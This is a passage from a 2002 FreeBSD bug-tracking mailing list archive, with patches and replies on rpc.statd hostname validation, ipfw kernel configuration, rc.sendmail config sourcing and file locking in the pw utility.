*)malloc(sizeof(MonList)); + if (!lp) + { + syslog(LOG_ERR, "Out of memory"); + } + else + { + strncpy(lp->notifyHost, arg->mon_id.my_id.my_name, SM_MAXSTRLEN); + lp->notifyProg = arg->mon_id.my_id.my_prog; + lp->notifyVers = arg->mon_id.my_id.my_vers; + lp->notifyProc = arg->mon_id.my_id.my_proc; + memcpy(lp->notifyData, arg->priv, sizeof(lp->notifyData)); + + lp->next = hp->monList; + hp->monList = lp; + sync_file(); + + res.res_stat = stat_succ; /* Report success */ + } } } - return (&res); } Only in /usr/bugfixes/rpc.statd: rpc_statd.patch diff -u /usr/src/usr.sbin/rpc.statd/statd.h /usr/bugfixes/rpc.statd/statd.h --- /usr/src/usr.sbin/rpc.statd/statd.h Sun Mar 31 23:36:06 1996 +++ /usr/bugfixes/rpc.statd/statd.h Tue May 7 19:12:35 2002 @@ -121,3 +121,4 @@ extern void init_file(char * /*filename*/); extern void notify_hosts(void); extern void sync_file(void); +extern int sm_check_hostname(char * /* arg */); To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 19:18: 9 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3B5FD37B409; Mon, 24 Jun 2002 19:17:57 -0700 (PDT) Received: (from billf@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5P2Hvt68844; Mon, 24 Jun 2002 19:17:57 -0700 (PDT) (envelope-from billf) Date: Mon, 24 Jun 2002 19:17:57 -0700 (PDT) From: Message-Id: <200206250217.g5P2Hvt68844@freefall.freebsd.org> To: pepper@mail.rockefeller.edu, billf@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/39814: GENERIC kernel should include ipfw Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: GENERIC kernel should include ipfw State-Changed-From-To: open->closed State-Changed-By: billf State-Changed-When: Mon Jun 24 19:16:11 PDT 2002 State-Changed-Why: thanks to the joys of kernel modules, firewalling doesn't require a kernel rebuild (or reboot). man kldload, man ipfw, see src/sys/modules/ipfw/Makefile IPFIREWALL_FORWARDing requiring a kernel rebuild is a known issues and is being addressed already. http://www.freebsd.org/cgi/query-pr.cgi?pr=39814 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 19:20: 9 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EF44D37B401 for ; Mon, 24 Jun 2002 19:20:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5P2K2c68971; Mon, 24 Jun 2002 19:20:02 -0700 (PDT) (envelope-from gnats) Date: Mon, 24 Jun 2002 19:20:02 -0700 (PDT) Message-Id: <200206250220.g5P2K2c68971@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Larry Rosenman Subject: Re: kern/39814: GENERIC kernel should include ipf Reply-To: Larry Rosenman Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/39814; it has been noted by GNATS. From: Larry Rosenman To: Chris Pepper Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: kern/39814: GENERIC kernel should include ipf Date: 24 Jun 2002 21:12:29 -0500 What if someone prefers IPFilter? Why change it? LER -- Larry Rosenman http://www.lerctr.org/~ler Phone: +1 972-414-9812 E-Mail: ler@lerctr.org US Mail: 1905 Steamboat Springs Drive, Garland, TX 75044-6749 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 19:25:37 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from mail.reppep.com (www.reppep.com [64.81.19.108]) by hub.freebsd.org (Postfix) with ESMTP id C171C37B42C; Mon, 24 Jun 2002 19:24:57 -0700 (PDT) Received: from [64.81.19.109] (g4.reppep.com [64.81.19.109]) by mail.reppep.com (Postfix) with ESMTP id 7FC1C17BDF; Mon, 24 Jun 2002 21:29:50 -0400 (EDT) Mime-Version: 1.0 X-Sender: pepper@mail.reppep.com Message-Id: In-Reply-To: <200206250217.g5P2Hvt68844@freefall.freebsd.org> References: <200206250217.g5P2Hvt68844@freefall.freebsd.org> Date: Mon, 24 Jun 2002 22:24:37 -0400 To: From: Chris Pepper Subject: Re: kern/39814: GENERIC kernel should include ipfw Cc: Matthew Dillon , freebsd-bugs@FreeBSD.org Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 7:17 PM -0700 02/6/24, wrote: >Synopsis: GENERIC kernel should include ipfw > >State-Changed-From-To: open->closed >State-Changed-By: billf >State-Changed-When: Mon Jun 24 19:16:11 PDT 2002 >State-Changed-Why: >thanks to the joys of kernel modules, firewalling doesn't >require a kernel rebuild (or reboot). > >man kldload, man ipfw, see src/sys/modules/ipfw/Makefile > >IPFIREWALL_FORWARDing requiring a kernel rebuild is a >known issues and is being addressed already. > > >http://www.freebsd.org/cgi/query-pr.cgi?pr=39814 Then /usr/share/man/man7/firewall.7.gz should be updated, as it claims a kernel rebuild is required for firewall usage: >IPFW KERNEL CONFIGURATION > To use the ip firewall features of FreeBSD you must create a custom ker- > nel with the IPFIREWALL option set. The kernel defaults its firewall to > deny all packets by default, which means that if you do not load in a > permissive ruleset via /etc/rc.conf, rebooting into your new kernel will > take the network offline and will prevent you from being able to access > it if you are not sitting at the console. It is also quite common to > update a kernel to a new release and reboot before updating the binaries. > This can result in an incompatibility between the ipfw(8) program and the > kernel which prevents it from running in the boot sequence, also result- > ing in an inaccessible machine. Because of these problems the > IPFIREWALL_DEFAULT_TO_ACCEPT kernel option is also available which > changes the default firewall to pass through all packets. Note, however, > that this is a very dangerous option to set because it means your fire- > wall is disabled during booting. You should use this option while get- > ting up to speed with FreeBSD firewalling, but get rid of it once you > understand how it all works to close the loophole. There is a third > option called IPDIVERT which allows you to use the firewall to divert > packets to a user program and is necessary if you wish to use natd(8) to > give private internal networks access to the outside world. If you want > to be able to limit the bandwidth used by certain types of traffic, the > DUMMYNET option must be used to enable ipfw pipe rules. Chris Pepper -- Chris Pepper: Rockefeller University: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 19:27:44 2002 Delivered-To: freebsd-bugs@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [216.240.41.2]) by hub.freebsd.org (Postfix) with ESMTP id 97C7137B415; Mon, 24 Jun 2002 19:27:18 -0700 (PDT) Received: from apollo.backplane.com (localhost [127.0.0.1]) by apollo.backplane.com (8.12.3/8.12.3) with ESMTP id g5P2RIl1001764; Mon, 24 Jun 2002 19:27:18 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.12.3/8.12.3/Submit) id g5P2RIvn001763; Mon, 24 Jun 2002 19:27:18 -0700 (PDT) (envelope-from dillon) Date: Mon, 24 Jun 2002 19:27:18 -0700 (PDT) From: Matthew Dillon Message-Id: <200206250227.g5P2RIvn001763@apollo.backplane.com> To: Chris Pepper Cc: , freebsd-bugs@FreeBSD.org Subject: Re: kern/39814: GENERIC kernel should include ipfw Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I'll update it. -Matt Matthew Dillon :>known issues and is being addressed already. :> :> :>http://www.freebsd.org/cgi/query-pr.cgi?pr=39814 : : Then /usr/share/man/man7/firewall.7.gz should be updated, as :it claims a kernel rebuild is required for firewall usage: : :>IPFW KERNEL CONFIGURATION :> To use the ip firewall features of FreeBSD you must create a custom ker- :> nel with the IPFIREWALL option set. The kernel defaults its firewall to :> deny all packets by default, which means that if you do not load in a :> permissive ruleset via /etc/rc.conf, rebooting into your new kernel will :> take the network offline and will prevent you from being able to access :> it if you are not sitting at the console. It is also quite common to :> update a kernel to a new release and reboot before updating the binaries. :> This can result in an incompatibility between the ipfw(8) program and the :> kernel which prevents it from running in the boot sequence, also result- :> ing in an inaccessible machine. Because of these problems the :> IPFIREWALL_DEFAULT_TO_ACCEPT kernel option is also available which :> changes the default firewall to pass through all packets. Note, however, :> that this is a very dangerous option to set because it means your fire- :> wall is disabled during booting. You should use this option while get- :> ting up to speed with FreeBSD firewalling, but get rid of it once you :> understand how it all works to close the loophole. There is a third :> option called IPDIVERT which allows you to use the firewall to divert :> packets to a user program and is necessary if you wish to use natd(8) to :> give private internal networks access to the outside world. If you want :> to be able to limit the bandwidth used by certain types of traffic, the :> DUMMYNET option must be used to enable ipfw pipe rules. : : : Chris Pepper :-- :Chris Pepper: :Rockefeller University: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 19:50:54 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7E67537B435 for ; Mon, 24 Jun 2002 19:50:05 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5P2o5Q72035; Mon, 24 Jun 2002 19:50:05 -0700 (PDT) (envelope-from gnats) Date: Mon, 24 Jun 2002 19:50:05 -0700 (PDT) Message-Id: <200206250250.g5P2o5Q72035@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Garrett Wollman Subject: bin/39815: rpc.statd bug Reply-To: Garrett Wollman Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/39815; it has been noted by GNATS. From: Garrett Wollman To: "C.S.Peron" Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: bin/39815: rpc.statd bug Date: Mon, 24 Jun 2002 22:40:29 -0400 (EDT) < said: > + if ((err = sm_check_hostname(arg->mon_name)) == 0) > + { > + syslog(LOG_ERR, "sm_stat: hostname contained invalid characters."); We have a library routine, strvis(3), which would be a more appropriate solution. { char *p = malloc(4 * strlen(arg->mon_name) + 1); if (p == 0) do_whatever_I_need_to_do_to_abort(); strvis(p, arg->mon_name, VIS_WHITE); syslog(LOG_ERR, "invalid hostname to sm_stat: %s", p); res.res_stat = stat_fail; free(p); } -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 21:50:26 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 707D337B40B for ; Mon, 24 Jun 2002 21:50:02 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5P4o1392832; Mon, 24 Jun 2002 21:50:01 -0700 (PDT) (envelope-from gnats) Received: from nwww.freebsd.org (www.FreeBSD.org [216.136.204.117]) by hub.freebsd.org (Postfix) with ESMTP id B05D837B403 for ; Mon, 24 Jun 2002 21:40:36 -0700 (PDT) Received: from www.freebsd.org (localhost [127.0.0.1]) by nwww.freebsd.org (8.12.2/8.12.2) with ESMTP id g5P4eahG067217 for ; Mon, 24 Jun 2002 21:40:36 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.2/8.12.2/Submit) id g5P4eawY067216; Mon, 24 Jun 2002 21:40:36 -0700 (PDT) Message-Id: <200206250440.g5P4eawY067216@www.freebsd.org> Date: Mon, 24 Jun 2002 21:40:36 -0700 (PDT) From: WATANABE Yuichi To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: conf/39825: /etc/rc.sendmail not appropriate configuration file evaluation Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39825 >Category: conf >Synopsis: /etc/rc.sendmail not appropriate configuration file evaluation >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Jun 24 21:50:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: WATANABE Yuichi >Release: FreeBSD 4.6R >Organization: ASCII Corp. >Environment: FreeBSD oapc21.oa.ascii.co.jp 4.6-RELEASE FreeBSD 4.6-RELEASE #0: Tue Jun 11 06:14:12 GMT 2002 murray@builder.freebsdmall.com:/usr/src/sys/compile/GENERIC i386 >Description: /etc/rc.sendmail evaluates configuraiton file, but this program evaluate only one file. this is not appropriate, I think. >How-To-Repeat: >Fix: # diff -c -r1.1 rc.sendmail *** rc.sendmail 2002/06/25 04:29:32 1.1 --- rc.sendmail 2002/06/25 04:30:08 *************** *** 43,49 **** if [ -r /etc/defaults/rc.conf ]; then . /etc/defaults/rc.conf source_rc_confs ! elif [ -r /etc/rc.conf ]; then . /etc/rc.conf fi --- 43,51 ---- if [ -r /etc/defaults/rc.conf ]; then . /etc/defaults/rc.conf source_rc_confs ! fi ! #elif [ -r /etc/rc.conf ]; then ! if [ -r /etc/rc.conf ]; then . /etc/rc.conf fi >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 22:20:10 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 59D4537B401 for ; Mon, 24 Jun 2002 22:20:04 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5P5K4V03629; Mon, 24 Jun 2002 22:20:04 -0700 (PDT) (envelope-from gnats) Date: Mon, 24 Jun 2002 22:20:04 -0700 (PDT) Message-Id: <200206250520.g5P5K4V03629@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Makoto Matsushita Subject: Re: conf/39825: /etc/rc.sendmail not appropriate configuration file evaluation Reply-To: Makoto Matsushita Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR conf/39825; it has been noted by GNATS. From: Makoto Matsushita To: bug-followup@FreeBSD.org Cc: Subject: Re: conf/39825: /etc/rc.sendmail not appropriate configuration file evaluation Date: Tue, 25 Jun 2002 14:14:07 +0900 yuu-w> /etc/rc.sendmail evaluates configuraiton file, but this program yuu-w> evaluate only one file. this is not appropriate, I think. Wrong assumption. See source_rc_confs() in /etc/defaults/rc.conf. This PR can be closed. -- - Makoto `MAR' Matsushita To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 23: 0:28 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 98C3E37B405 for ; Mon, 24 Jun 2002 23:00:06 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5P606q08404; Mon, 24 Jun 2002 23:00:06 -0700 (PDT) (envelope-from gnats) Date: Mon, 24 Jun 2002 23:00:06 -0700 (PDT) Message-Id: <200206250600.g5P606q08404@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Paul Herman Subject: Re: bin/38676 change request for pw command Reply-To: Paul Herman Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/38676; it has been noted by GNATS. From: Paul Herman To: FreeBSD-gnats-submit@FreeBSD.ORG Cc: Takumi ISHII , "Geoffrey C. Speicher" , "Matthew D. Fuller" Subject: Re: bin/38676 change request for pw command Date: Mon, 24 Jun 2002 22:52:50 -0700 (PDT) Here is an better version of the patch in bin/23501. In addition to the advisory lock, link counts are checked to avoid any unlink/rename issues. This has been tested by myself and seems to also fix the problem. The topic of HOW to best fix this bug has recently been hashed out a bit on -hackers and -stable. Matthew Fuller proposed an alternate fix by using a giant lock in /var/run/, so the jury is still out on the best way to solve the problem. I'll let Matthew speak for himself, but I feel that the either the patch in bin/23501 or the following improved patch is the best way to solve the problem. Opinions in the audit-trail are surely to follow. :-) -Paul. Index: edgroup.c =================================================================== RCS file: /u02/ncvs/src/usr.sbin/pw/edgroup.c,v retrieving revision 1.8 diff -u -r1.8 edgroup.c --- edgroup.c 28 Aug 1999 01:19:16 -0000 1.8 +++ edgroup.c 25 Jun 2002 05:27:49 -0000 @@ -68,7 +68,26 @@ strcpy(grouptmp, groupfile); strcat(grouptmp, ".new"); - if ((infd = open(groupfile, O_RDWR | O_CREAT, 0644)) != -1) { + /* + * Open and lock the original group file. We check the link count + * in order to avoid any link/unlink/remove race. + */ + for (;;) { + struct stat st; + + infd = open(groupfile, O_RDWR | O_CREAT | O_EXLOCK, 0644); + if (infd == -1) + break; + if (fstat(infd, &st) < 0) { + close(infd); + return -1; + } + if (st.st_nlink == 1) + break; + close(infd); + } + + if (infd != -1) { FILE *infp; if ((infp = fdopen(infd, "r+")) == NULL) Index: fileupd.c =================================================================== RCS file: /u02/ncvs/src/usr.sbin/pw/fileupd.c,v retrieving revision 1.9 diff -u -r1.9 fileupd.c --- fileupd.c 26 Oct 1999 04:27:13 -0000 1.9 +++ fileupd.c 25 Jun 2002 04:15:08 -0000 @@ -76,8 +76,25 @@ if (pfxlen <= 1) rc = EINVAL; else { - int infd = open(filename, O_RDWR | O_CREAT, fmode); - + /* + * Open and lock the original file. We check the link count + * in order to avoid any link/unlink/rename race. + */ + int infd; + for (;;) { + struct stat st; + infd = open(filename, O_RDWR | O_CREAT | O_EXLOCK, fmode); + if (infd == -1) + break; + if (fstat(infd, &st) < 0) { + rc = errno; + close(infd); + return rc; + } + if (st.st_nlink == 1) + break; + close(infd); + } if (infd == -1) rc = errno; else { To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 23: 0:48 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 76C2637B40A for ; Mon, 24 Jun 2002 23:00:09 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5P609S08416; Mon, 24 Jun 2002 23:00:09 -0700 (PDT) (envelope-from gnats) Date: Mon, 24 Jun 2002 23:00:09 -0700 (PDT) Message-Id: <200206250600.g5P609S08416@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Matthew D. Fuller" Subject: Re: bin/38676 change request for pw command Reply-To: "Matthew D. Fuller" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/38676; it has been noted by GNATS. From: "Matthew D. Fuller" To: Paul Herman Cc: FreeBSD-gnats-submit@FreeBSD.ORG, Takumi ISHII , "Geoffrey C. Speicher" Subject: Re: bin/38676 change request for pw command Date: Tue, 25 Jun 2002 00:58:29 -0500 On Mon, Jun 24, 2002 at 10:52:50PM -0700 I heard the voice of Paul Herman, and lo! it spake thus: > > The topic of HOW to best fix this bug has recently been hashed out > a bit on -hackers and -stable. Matthew Fuller proposed an > alternate fix by using a giant lock in /var/run/, so the jury is > still out on the best way to solve the problem. > > I'll let Matthew speak for himself, but I feel that the either the > patch in bin/23501 or the following improved patch is the best way > to solve the problem. Opinions in the audit-trail are surely to > follow. :-) First post! *duck* I see no problem with (assuming this works; I'm short on testing time for this OR my method this week), if nothing else, smacking this in for now; it's not like we can't change our attack method on this next week or next month. However: > + for (;;) { > + [ stuff(); ] > + close(infd); > + } Might I suggest a sleep(1); in there? Give the poor CPU a break! :-> -- Matthew Fuller (MF4839) | fullermd@over-yonder.net Systems/Network Administrator | http://www.over-yonder.net/~fullermd/ "The only reason I'm burning my candle at both ends, is because I haven't figured out how to light the middle yet" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Jun 24 23:20:12 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id B3E0037B401 for ; Mon, 24 Jun 2002 23:20:03 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5P6K3i14665; Mon, 24 Jun 2002 23:20:03 -0700 (PDT) (envelope-from gnats) Date: Mon, 24 Jun 2002 23:20:03 -0700 (PDT) Message-Id: <200206250620.g5P6K3i14665@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Paul Herman Subject: Re: bin/38676: change request for pw command Reply-To: Paul Herman Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR bin/38676; it has been noted by GNATS. From: Paul Herman To: "Matthew D. Fuller" Cc: FreeBSD-gnats-submit@FreeBSD.ORG, Takumi ISHII , "Geoffrey C. Speicher" Subject: Re: bin/38676: change request for pw command Date: Mon, 24 Jun 2002 23:07:14 -0700 (PDT) On Tue, 25 Jun 2002, Matthew D. Fuller wrote: > > + for (;;) { > > + [ stuff(); ] > > + close(infd); > > + } > > Might I suggest a sleep(1); in there? Give the poor CPU a break! :-> :-) That's what I first thought, but open() will block until the lock frees up. If the link count isn't 1, I don't think it should sleep, but it just as well could usleep() I suppose, but I don't think it's a big deal. This idea was taken from Matt Dillon's pwd_mkdb.c rev 1.29 fix. -Paul. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 25 0:12:51 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id EC15337BC10 for ; Tue, 25 Jun 2002 00:10:01 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5P7A1e24262; Tue, 25 Jun 2002 00:10:01 -0700 (PDT) (envelope-from gnats) Received: from nwww.freebsd.org (www.FreeBSD.org [216.136.204.117]) by hub.freebsd.org (Postfix) with ESMTP id 59A3737BB5D for ; Tue, 25 Jun 2002 00:04:51 -0700 (PDT) Received: from www.freebsd.org (localhost [127.0.0.1]) by nwww.freebsd.org (8.12.2/8.12.2) with ESMTP id g5P74nhG083388 for ; Tue, 25 Jun 2002 00:04:49 -0700 (PDT) (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.12.2/8.12.2/Submit) id g5P74nFD083387; Tue, 25 Jun 2002 00:04:49 -0700 (PDT) Message-Id: <200206250704.g5P74nFD083387@www.freebsd.org> Date: Tue, 25 Jun 2002 00:04:49 -0700 (PDT) From: Derek To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: i386/39829: BUG Hardware Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >Number: 39829 >Category: i386 >Synopsis: BUG Hardware >Confidential: no >Severity: critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jun 25 00:10:01 PDT 2002 >Closed-Date: >Last-Modified: >Originator: Derek >Release: 4.6 >Organization: >Environment: N\A >Description: The Bug is you need to support Nvidia Nforce Chipsets i can use freebsd without support for the integrated Ethernet card :-( >How-To-Repeat: Buy an MSI K7N420 PRO >Fix: Spend 20 minutes making a driver :-) I know i must be a pain in the ass >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 25 0:41:28 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 0097437B6B3 for ; Tue, 25 Jun 2002 00:40:04 -0700 (PDT) Received: (from gnats@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5P7e3928178; Tue, 25 Jun 2002 00:40:03 -0700 (PDT) (envelope-from gnats) Date: Tue, 25 Jun 2002 00:40:03 -0700 (PDT) Message-Id: <200206250740.g5P7e3928178@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: "Yahel Zamir" Subject: Re: kern/39109: m_cat() does not update m_pkthdr.len Reply-To: "Yahel Zamir" Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org The following reply was made to PR kern/39109; it has been noted by GNATS. From: "Yahel Zamir" To: , "Yahel Zamir" Cc: Subject: Re: kern/39109: m_cat() does not update m_pkthdr.len Date: Tue, 25 Jun 2002 10:30:23 +0300 issue should be closed. mbuf chains do not have to start with a packet header. and they are allowed to have packet header in the middle. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 25 1:28:16 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id AA8C237B405; Tue, 25 Jun 2002 01:28:13 -0700 (PDT) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5P8SD540637; Tue, 25 Jun 2002 01:28:13 -0700 (PDT) (envelope-from dougb) Date: Tue, 25 Jun 2002 01:28:13 -0700 (PDT) From: Message-Id: <200206250828.g5P8SD540637@freefall.freebsd.org> To: proximityzero@attbi.com, dougb@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/39829: BUG Hardware Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: BUG Hardware State-Changed-From-To: open->closed State-Changed-By: dougb State-Changed-When: Tue Jun 25 01:27:25 PDT 2002 State-Changed-Why: I'm sorry to say, this does not meet our definition of a problem report. Please send your problem to freebsd-questions@freebsd.org if you're still having problems. Good luck. http://www.freebsd.org/cgi/query-pr.cgi?pr=39829 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 25 1:29:31 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A130237B404; Tue, 25 Jun 2002 01:29:23 -0700 (PDT) Received: (from dougb@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g5P8TNG40720; Tue, 25 Jun 2002 01:29:23 -0700 (PDT) (envelope-from dougb) Date: Tue, 25 Jun 2002 01:29:23 -0700 (PDT) From: Message-Id: <200206250829.g5P8TNG40720@freefall.freebsd.org> To: yuu-w@ascii.co.jp, dougb@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: conf/39825: /etc/rc.sendmail not appropriate configuration file evaluation Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Synopsis: /etc/rc.sendmail not appropriate configuration file evaluation State-Changed-From-To: open->closed State-Changed-By: dougb State-Changed-When: Tue Jun 25 01:28:44 PDT 2002 State-Changed-Why: As was pointed out to you, the source_rc_confs function includes all defined rc.conf files. http://www.freebsd.org/cgi/query-pr.cgi?pr=39825 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Jun 25 1:51:53 2002 Delivered-To: freebsd-bugs@hub.freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D4EA037B48A; Tue, 25 Jun 2002 01:50:53 -0700 (PDT) Received: (from tjr@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id 